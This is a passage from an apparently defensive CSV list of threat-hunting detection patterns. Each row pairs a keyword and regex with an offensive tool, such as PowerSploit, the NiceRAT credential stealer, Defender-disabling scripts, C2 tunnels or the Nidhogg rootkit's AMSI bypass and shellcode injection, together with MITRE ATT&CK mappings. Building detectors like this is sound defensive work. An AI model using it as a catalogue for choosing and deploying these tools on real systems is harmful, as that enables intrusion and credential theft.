Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Persistence.psm1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*New-UserPersistenceOption*",".{0,1000}New\-UserPersistenceOption.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*New-VolumeShadowCopy*",".{0,1000}New\-VolumeShadowCopy.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*New-WmiSession.ps1*",".{0,1000}New\-WmiSession\.ps1.{0,1000}","offensive_tool_keyword","Wmisploit","WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.","T1087 - T1059.001 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/secabstraction/WmiSploit","1","1","N/A","N/A","2","163","39","2015-08-28T23:56:00Z","2015-03-15T03:30:02Z" "*Nexpose*",".{0,1000}Nexpose.{0,1000}","offensive_tool_keyword","rapid7","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://www.rapid7.com/products/nexpose/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*nextnet.exe*",".{0,1000}nextnet\.exe.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 - T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - 
TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","89","42","2024-04-21T05:49:15Z","2021-01-20T13:08:24Z" "*NextronSystems*",".{0,1000}NextronSystems.{0,1000}","offensive_tool_keyword","Github Username","Author of APT simulator","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/NextronSystems","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*nfxwi0lomv0gk21unfxgo3dfon0gs1th*",".{0,1000}nfxwi0lomv0gk21unfxgo3dfon0gs1th.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*nginx/striker.log*",".{0,1000}nginx\/striker\.log.{0,1000}","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","0","N/A","10","10","290","44","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" "*-nh 127.0.0.1 -nP 7687 -nu neo4j -np *",".{0,1000}\-nh\s127\.0\.0\.1\s\-nP\s7687\s\-nu\sneo4j\s\-np\s.{0,1000}","offensive_tool_keyword","sprayhound","Password spraying tool and Bloodhound integration","T1110.003 - T1210.001 - T1069.002","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/Hackndo/sprayhound","1","0","N/A","N/A","2","156","16","2023-02-15T11:26:53Z","2020-02-06T17:45:37Z" "*nheiniger/SnaffPoint*",".{0,1000}nheiniger\/SnaffPoint.{0,1000}","offensive_tool_keyword","SnaffPoint","A tool for pointesters to find candies in SharePoint","T1210.001 - T1087.002 - 
T1059.006","TA0007 - TA0002 - TA0006","N/A","N/A","Discovery","https://github.com/nheiniger/SnaffPoint","1","0","N/A","7","3","210","20","2022-11-04T13:26:24Z","2022-08-25T13:16:06Z" "*niam/noitcetorP-repmaT-ssapyB*",".{0,1000}niam\/noitcetorP\-repmaT\-ssapyB.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*NiceRAT | * Stealer*",".{0,1000}NiceRAT\s\|\s.{0,1000}\s\sStealer.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*NiceRAT-main.zip*",".{0,1000}NiceRAT\-main\.zip.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","1","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*Nick Swink aka c0rnbread*",".{0,1000}Nick\sSwink\saka\sc0rnbread.{0,1000}","offensive_tool_keyword","SilentHound","Quietly enumerate an Active Directory Domain via LDAP parsing users + admins + groups...","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/layer8secure/SilentHound","1","0","AD Enumeration","7","5","465","44","2023-01-23T20:41:55Z","2022-07-01T13:49:24Z" 
"*nickvourd/COM-Hunter*",".{0,1000}nickvourd\/COM\-Hunter.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistence tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","1","N/A","10","3","241","46","2024-03-10T11:00:11Z","2022-05-26T19:34:59Z" "*nickvourd/Supernova*",".{0,1000}nickvourd\/Supernova.{0,1000}","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","1","N/A","10","6","573","100","2024-04-30T14:35:29Z","2023-08-08T11:30:34Z" "*nickzer0/RagingRotator*",".{0,1000}nickzer0\/RagingRotator.{0,1000}","offensive_tool_keyword","RagingRotator","A tool for carrying out brute force attacks against Office 365 with built in IP rotation use AWS gateways.","T1110 - T1027 - T1071 - T1090","TA0006 - TA0005 - TA0001","N/A","N/A","Credential Access","https://github.com/nickzer0/RagingRotator","1","1","N/A","10","1","74","5","2024-02-05T21:46:54Z","2023-09-01T15:19:38Z" "*nicocha30/ligolo-ng*",".{0,1000}nicocha30\/ligolo\-ng.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","N/A","C2","https://github.com/nicocha30/ligolo-ng","1","1","N/A","10","10","2156","226","2024-04-26T01:27:05Z","2021-07-28T12:55:36Z" "*Nidhogg rootkit*",".{0,1000}Nidhogg\srootkit.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - 
T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg*AntiAnalysis.hpp*",".{0,1000}Nidhogg.{0,1000}AntiAnalysis\.hpp.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" 
"*Nidhogg::AntiAnalysis::NidhoggDisableCallback*",".{0,1000}Nidhogg\:\:AntiAnalysis\:\:NidhoggDisableCallback.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::AntiAnalysis::NidhoggEnableDisableEtwTi*",".{0,1000}Nidhogg\:\:AntiAnalysis\:\:NidhoggEnableDisableEtwTi.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - 
TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::AntiAnalysis::NidhoggListObCallbacks*",".{0,1000}Nidhogg\:\:AntiAnalysis\:\:NidhoggListObCallbacks.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::AntiAnalysis::NidhoggListPsRoutines*",".{0,1000}Nidhogg\:\:AntiAnalysis\:\:NidhoggListPsRoutines.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - 
T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::AntiAnalysis::NidhoggListRegistryCallbacks*",".{0,1000}Nidhogg\:\:AntiAnalysis\:\:NidhoggListRegistryCallbacks.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::AntiAnalysis::NidhoggRestoreCallback*",".{0,1000}Nidhogg\:\:AntiAnalysis\:\:NidhoggRestoreCallback.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - 
T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::FileUtils::NidhoggFileClearAllProtection*",".{0,1000}Nidhogg\:\:FileUtils\:\:NidhoggFileClearAllProtection.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::FileUtils::NidhoggFileProtect*",".{0,1000}Nidhogg\:\:FileUtils\:\:NidhoggFileProtect.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - 
T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::FileUtils::NidhoggFileUnprotect*",".{0,1000}Nidhogg\:\:FileUtils\:\:NidhoggFileUnprotect.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::FileUtils::NidhoggQueryFiles*",".{0,1000}Nidhogg\:\:FileUtils\:\:NidhoggQueryFiles.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - 
T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::ModuleUtils::NidhoggAmsiBypass*",".{0,1000}Nidhogg\:\:ModuleUtils\:\:NidhoggAmsiBypass.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" 
"*Nidhogg::ModuleUtils::NidhoggETWBypass*",".{0,1000}Nidhogg\:\:ModuleUtils\:\:NidhoggETWBypass.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::ModuleUtils::NidhoggInjectDll*",".{0,1000}Nidhogg\:\:ModuleUtils\:\:NidhoggInjectDll.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - 
TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::ModuleUtils::NidhoggInjectShellcode*",".{0,1000}Nidhogg\:\:ModuleUtils\:\:NidhoggInjectShellcode.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::ModuleUtils::NidhoggPatchModule*",".{0,1000}Nidhogg\:\:ModuleUtils\:\:NidhoggPatchModule.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 